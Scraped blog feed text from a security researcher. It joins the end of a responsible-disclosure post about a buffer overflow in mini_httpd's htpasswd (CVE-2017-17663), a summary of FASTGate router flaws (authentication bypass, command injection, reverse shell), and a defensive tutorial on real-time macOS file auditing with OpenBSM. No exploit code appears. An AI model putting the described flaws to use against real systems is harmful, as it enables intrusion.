<p>Since the source code was available, I started to do some analysis and noticed a trivial buffer overflow in the <code class="language-plaintext highlighter-rouge">htpasswd.c</code> file, which turned out to be a custom, simplified version of the original <em>htpasswd</em> utility developed for the Apache HTTP Server and used to <code class="language-plaintext highlighter-rouge">create and update the flat-files used to store usernames and passwords for basic authentication of HTTP users</code>.<br />
The simplified version developed by ACME Laboratories had a buffer overflow vulnerability, since the username parameter provided through the command line was copied into a buffer without any bounds check. The vulnerability could be exploited to execute malicious payloads if the utility can be invoked remotely, for example to set up an account: in this case an attacker can craft an exploit and gain code execution on the vulnerable system.<br />
After disclosing the vulnerability to the maintainer of the web server, an update that fixed it was released through the developer’s website.</p>
<h3 id="disclosure-timeline-of-the-buffer-overflow">Disclosure timeline of the Buffer Overflow</h3>
<ul>
<li>01 December 2017 - Contacted the developer to ask how to report security findings</li>
<li>12 December 2017 - Sent the details of the vulnerability to the developer</li>
<li>13 December 2017 - Developer acknowledged the vulnerability</li>
<li>13 December 2017 - CVE assigned: <em>CVE-2017-17663</em></li>
<li>04 February 2018 - Update released for mini_httpd & thttpd and <a href="https://acme.com/updates/archive/199.html">advisory published</a> for the vulnerability.</li>
</ul>
<hr />
<h2 id="footnotes">Footnotes</h2>
<div class="footnotes" role="doc-endnotes">
<ol>
<li id="fn:1" role="doc-endnote">
<p><a href="https://www.fastweb.it/">Fastweb S.p.A.</a> <a href="#fnref:1" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:2" role="doc-endnote">
<p><a href="https://www.fastweb.it/myfastweb/assistenza/guide/FASTGate/">FASTGate</a> <a href="#fnref:2" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:3" role="doc-endnote">
<p><a href="https://www.fastweb.it/corporate/responsible-disclosure/">Fastweb Responsible Disclosure</a> <a href="#fnref:3" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
<li id="fn:4" role="doc-endnote">
<p><a href="https://acme.com/software/mini_httpd/">mini_httpd - small HTTP server</a> <a href="#fnref:4" class="reversefootnote" role="doc-backlink">↩</a></p>
</li>
</ol>
</div>santoruThis blog post describes how I found a couple of vulnerabilities in the FASTGate modem/router provided by Fastweb, an Italian telecommunication company, to its clients. Thanks to these vulnerabilities I was able to bypass the authentication layer as well as execute arbitrary code via command injection and get a reverse shell back to the router. All vulnerabilities have been disclosed to Fastweb and are fixed in newer versions of the firmware.Real-time auditing on macOS with OpenBSM2017-07-02T20:05:24+00:002017-07-02T20:05:24+00:00https://insecurity.blog/2017/07/02/mac-os-real-time-auditing<h2 id="introduction">Introduction</h2>
<p>The goal of this blog post is to explain how to use the OpenBSM library to perform live auditing on macOS and detect which files are opened, and by whom.
Every day we install programs and applications on our computers, and they basically have access to most of our files.
Real-time auditing can be useful for a lot of reasons: maybe you’re just curious to see which files are opened by some application, or whether some malicious process is reading your personal documents or opening your photos. Maybe you are not curious but just want to detect possible ransomware activity and stop it.<br />
The scenarios are infinite.<br />
Another common scenario is using real-time auditing to build and run your personal host-based IDS by checking modifications and accesses to sensitive files.</p>
<p>In this blog post I will just explain how this auditing is possible thanks to OpenBSM, point the reader to some other resources for further “investigation”, and publish a small proof of concept of a basic implementation.</p>
<p>If you spot a mistake, I’ll be happy to fix it, just send an <a href="mailto:santoru@pm.me">email to me</a>.</p>
<h2 id="openbsm">OpenBSM</h2>
<p>According to the TrustedBSD project, OpenBSM is an open-source implementation of Sun’s BSM (Basic Security Module) event auditing file format and API, originally created for Apple Computer by McAfee Research.</p>
<p>This implementation provides a set of system calls and library interfaces for <strong>managing audit records</strong>, but also includes some command-line tools.</p>
<p>As we can see from the configuration files located in <span class="mon">/etc/security</span>, by default macOS uses two flags, <span class="mon">lo</span> and <span class="mon">aa</span>, to log Login/Logout (lo) and Authorization/Authentication (aa) events into the <span class="mon"><strong>/var/audit/</strong></span> directory.</p>
<pre class="highlight">
$ cat /etc/security/audit_control
#
# $P4: //depot/projects/trustedbsd/openbsm/etc/audit_control#8 $
#
dir:/var/audit
<b>flags:lo,aa</b>
minfree:5
naflags:lo,aa
policy:cnt,argv
filesz:2M
expire-after:10M
superuser-set-sflags-mask:has_authenticated,has_console_access
superuser-clear-sflags-mask:has_authenticated,has_console_access
member-set-sflags-mask:
member-clear-sflags-mask:has_authenticated
</pre>
<p>We can get some information about these flags, and about all available flags, from another file in the same directory:</p>
<pre class="highlight">
$ cat /etc/security/audit_class
#
# $P4: //depot/projects/trustedbsd/openbsm/etc/audit_class#6 $
#
0x00000000:no:invalid class
0x00000001:fr:file read
0x00000002:fw:file write
0x00000004:fa:file attribute access
0x00000008:fm:file attribute modify
0x00000010:fc:file create
0x00000020:fd:file delete
0x00000040:cl:file close
0x00000080:pc:process
0x00000100:nt:network
0x00000200:ip:ipc
0x00000400:na:non attributable
0x00000800:ad:administrative
<b>0x00001000:lo:login_logout
0x00002000:aa:authentication and authorization</b>
0x00004000:ap:application
0x20000000:io:ioctl
0x40000000:ex:exec
0x80000000:ot:miscellaneous
0xffffffff:all:all flags set
</pre>
<p>Since we want to monitor which files are accessed by a process, we can build our own audit program using the functions provided by OpenBSM and log, or display, only the relevant information.
To audit only some information we can specify one or more of the flags above: for example, if we want to log which files are opened for reading, we can use the <strong>“fr”</strong> flag, identified by the value <strong>0x00000001</strong>.</p>
<p>The Basic Security Module library provides some functions to read these events and automatically parse them.
In detail, we have four functions to manipulate and interact with events:</p>
<h4 id="au_read_rec">au_read_rec()</h4>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">int</span> <span class="nf">au_read_rec</span><span class="p">(</span><span class="kt">FILE</span> <span class="o">*</span><span class="n">fp</span><span class="p">,</span> <span class="n">u_char</span> <span class="o">**</span><span class="n">buf</span><span class="p">);</span></code></pre></figure>
<p>This function lets us read an event record from a file descriptor and put its content into the buffer <span class="mon">buf</span> passed as a parameter (which <strong>must</strong> be freed after use).
The function returns the number of bytes read.</p>
<h4 id="au_fetch_tok">au_fetch_tok()</h4>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">int</span> <span class="nf">au_fetch_tok</span><span class="p">(</span><span class="n">tokenstr_t</span> <span class="o">*</span><span class="n">tok</span><span class="p">,</span> <span class="n">u_char</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="kt">int</span> <span class="n">len</span><span class="p">);</span></code></pre></figure>
<p>The buffer obtained from <span class="mon">au_read_rec</span> contains tokens; every token is a struct whose contents depend on the token ID.
The first token of the buffer is always an <span class="mon">AUT_HEADER*</span> token: it contains a field that indicates which kind of event is in the buffer. The next tokens contain information such as the path of the process that raised the event, the path of the file involved in the event, the user, the timestamp…
To read the buffer with the record inside, we have to fetch every token in it sequentially, using <span class="mon">au_fetch_tok</span>.</p>
<h4 id="au_print_tok">au_print_tok()</h4>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">au_print_tok</span><span class="p">(</span><span class="kt">FILE</span> <span class="o">*</span><span class="n">outfp</span><span class="p">,</span> <span class="n">tokenstr_t</span> <span class="o">*</span><span class="n">tok</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">del</span><span class="p">,</span> <span class="kt">char</span> <span class="n">raw</span><span class="p">,</span> <span class="kt">char</span> <span class="n">sfrm</span><span class="p">);</span></code></pre></figure>
<p>Now that we have a token, we can print it to a file descriptor.</p>
<h4 id="au_print_flags_tok">au_print_flags_tok()</h4>
<figure class="highlight"><pre><code class="language-c" data-lang="c"><span class="kt">void</span> <span class="nf">au_print_flags_tok</span><span class="p">(</span><span class="kt">FILE</span> <span class="o">*</span><span class="n">outfp</span><span class="p">,</span> <span class="n">tokenstr_t</span> <span class="o">*</span><span class="n">tok</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">del</span><span class="p">,</span> <span class="kt">int</span> <span class="n">oflags</span><span class="p">);</span></code></pre></figure>
<p>Another way to print a token is <span class="mon">au_print_flags_tok</span>, which accepts an additional parameter to specify different output formats (XML, raw, short…).</p>
<p>A typical use of these functions could be:</p>
<ul>
<li>Open a file (usually an audit pipe) with <span class="mon">fopen()</span> and read records from it into a buffer by calling <span class="mon">au_read_rec()</span>.</li>
<li>Read each token of each record through calls to <span class="mon">au_fetch_tok()</span> on the buffer</li>
<li>Invoke <span class="mon">au_print_flags_tok()</span> to print each token to an output stream such as stdout.</li>
<li>Free the buffer</li>
<li>Close the opened file</li>
</ul>
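<p>Putting the steps above together, a minimal sketch could look like this. It is macOS-only: it needs root, links with <span class="mon">-lbsm</span>, and error handling is kept to a bare minimum on purpose:</p>

```c
/* Sketch: read live audit records from /dev/auditpipe and print each
 * token in the short format. macOS-only; run as root, build with -lbsm. */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <bsm/libbsm.h>

int main(void) {
    FILE *pipe = fopen("/dev/auditpipe", "r");
    if (pipe == NULL) { perror("fopen"); return 1; }

    u_char *buf;
    int reclen;
    while ((reclen = au_read_rec(pipe, &buf)) > 0) {
        tokenstr_t tok;
        int pos = 0;
        /* A record is a sequence of tokens; fetch them one by one. */
        while (pos < reclen &&
               au_fetch_tok(&tok, buf + pos, reclen - pos) == 0) {
            au_print_flags_tok(stdout, &tok, ",", AU_OFLAG_SHORT);
            printf("\n");
            pos += tok.len;
        }
        free(buf);   /* the record buffer must be freed after use */
    }
    fclose(pipe);
    return 0;
}
```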
<p>There is only one problem I found while parsing these events with the provided functions: <span class="mon">au_print_tok()</span> and <span class="mon">au_print_flags_tok()</span> take as input a token from <span class="mon">au_fetch_tok()</span>, and there is no way to parse or filter it to get a nicer and more descriptive output.
My solution was to bypass the two functions and manually parse the token to extract only the most interesting properties. But how are these tokens made?
As said before, every event is made of some tokens. A token is just a C struct whose contents depend on the ID of the token.
A read event, for example, has 3 main tokens: <span class="mon">AUT_HEADER</span>, <span class="mon">AUT_SUBJECT</span> and <span class="mon">AUT_PATH</span>.<br />
<span class="mon">AUT_HEADER</span> contains information about the event; in a read event, it shows that the event is actually a file read (fr).<br />
<span class="mon">AUT_SUBJECT</span> defines which process raised the event, while <span class="mon">AUT_PATH</span> specifies which path was read by the <span class="mon">AUT_SUBJECT</span>.</p>
<p>We can manually parse the struct to print only useful information.</p>
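<p>A sketch of such manual parsing, as a helper you would call on each token from the fetch loop. The field names follow OpenBSM’s <span class="mon">tokenstr_t</span> union in <span class="mon">bsm/libbsm.h</span>; only the 32-bit token variants are handled here for brevity:</p>

```c
#include <stdio.h>
#include <bsm/libbsm.h>

/* Print only the properties we care about, instead of au_print_tok(). */
void print_interesting(tokenstr_t *tok) {
    switch (tok->id) {
    case AUT_HEADER32:
        /* e_type identifies the kind of event in this record. */
        printf("event=%u ", tok->tt.hdr32.e_type);
        break;
    case AUT_SUBJECT32:
        /* the process that raised the event */
        printf("pid=%d ", tok->tt.subj32.pid);
        break;
    case AUT_PATH:
        /* the file path the event refers to */
        printf("path=%s ", tok->tt.path.path);
        break;
    default:
        break;   /* ignore tokens we don't care about */
    }
}
```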
<h2 id="the-auditpipe">The auditpipe</h2>
<p>Now that we know how to read events, we need to know where to get real-time events from.
The solution is a specific device called the <i>auditpipe</i>, located at <i>/dev/auditpipe</i>.</p>
<p>The auditpipe is a pseudo-device for live audit event tracking that can be opened as a file and used with the four functions above to read and parse real-time events.</p>
<p>In order to use the auditpipe, we need to configure it with <span class="mon">ioctl</span> system calls to select which events we want to get from the pipe.<br /></p>
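<p>As a sketch of this configuration step (macOS-only, requires root): the auditpipe ioctls let us switch the pipe to its own local preselection, and <span class="mon">getauditflagsbin()</span> translates a flags string like the one in <span class="mon">audit_control</span> into a class mask:</p>

```c
#include <stdio.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <bsm/libbsm.h>
#include <security/audit/audit_ioctl.h>

int main(void) {
    int fd = open("/dev/auditpipe", O_RDONLY);
    if (fd < 0) { perror("open"); return 1; }

    /* Use this pipe's own preselection instead of the global config. */
    int mode = AUDITPIPE_PRESELECT_MODE_LOCAL;
    if (ioctl(fd, AUDITPIPE_SET_PRESELECT_MODE, &mode) < 0) {
        perror("ioctl mode"); return 1;
    }

    /* Ask only for file-read and file-write events ("fr,fw"). */
    au_mask_t mask;
    if (getauditflagsbin("fr,fw", &mask) != 0) {
        fprintf(stderr, "bad flags\n"); return 1;
    }
    if (ioctl(fd, AUDITPIPE_SET_PRESELECT_FLAGS, &mask) < 0) {
        perror("ioctl flags"); return 1;
    }

    /* fd can now be fdopen()ed and read with au_read_rec(). */
    close(fd);
    return 0;
}
```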
<h3 id="filewatcher---a-simple-auditing-utility-for-macos">filewatcher - a simple auditing utility for macOS</h3>
<p>I wrote a small utility to monitor file or process activities using the <i>auditpipe</i> and the functions I explained.<br />
You can find it <a href="https://github.com/santoru/filewatcher" target="_blank">directly on GitHub</a><br />
To configure the <i>auditpipe</i> I used an example found <a href="https://github.com/ashish-gehani/SPADE/blob/master/src/spade/reporter/spadeOpenBSM.c" target="_blank">here</a>.<br /> To parse the token’s structure I used the open source code from <a href="https://github.com/openbsm/bsmtrace/blob/master/bsm.c" target="_blank">OpenBSM</a>.<br />
The code is still pretty messy, but it works!
There are not many options at the moment, but my goal is to improve it into a fully-working auditing tool.
At the moment it is possible to specify which process or which file to monitor.
By default only some events are displayed, like <strong>open/read/write/close</strong>; anyway, it’s possible to display all events with an option. Check the help message!<br />
It’s also possible, for now, to enable debug message logging into a file.</p>
<h4 id="installation">Installation</h4>
<p>At the moment, there is only one line inside the <i>Makefile</i> to compile the tool, so you can just run <span class="mon">make</span> and it will compile into the <i>bin</i> folder.<br />
If you want to compile it manually, you need to link the bsm library:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>gcc <span class="nt">-lbsm</span> filewatcher.c lib/<span class="k">*</span>.c <span class="nt">-o</span> bin/filewatcher
</code></pre></div></div>
<h4 id="usage">Usage</h4>
<pre class="highlight">
$ sudo ./bin/filewatcher -h
filewatcher - a simple auditing utility for macOS
Usage: ./bin/filewatcher [OPTIONS]
-f, --file Set a file to filter
-p, --process Set a process name to filter
-a, --all Display all events (By default only basic events like open/read/write are displayed)
-d, --debug Enable debugging messages to be saved into a file
-h, --help Print this help and exit
</pre>
<figure class="image">
<img class="full-width" src="/img/filewatcher/screenshotsmall.png" alt="An example of the output" />
<figcaption>
An example of the output
</figcaption>
</figure>
<h2 id="references">References</h2>
<ul>
<li><a href="https://github.com/santoru/filewatcher" target="_blank">filewatcher</a></li>
<li><a href="http://www.trustedbsd.org/" target="_blank">TrustedBSD</a></li>
<li><a href="https://github.com/openbsm/openbsm" target="_blank">OpenBSM - GitHub</a></li>
<li><a href="https://www.freebsd.org/cgi/man.cgi?query=auditpipe" target="_blank">Auditpipe ioctls</a></li>
<li><a href="https://objective-see.com/blog/blog_0x0F.html" target="_blank">Towards Generic Ransomware Detection</a></li>
</ul>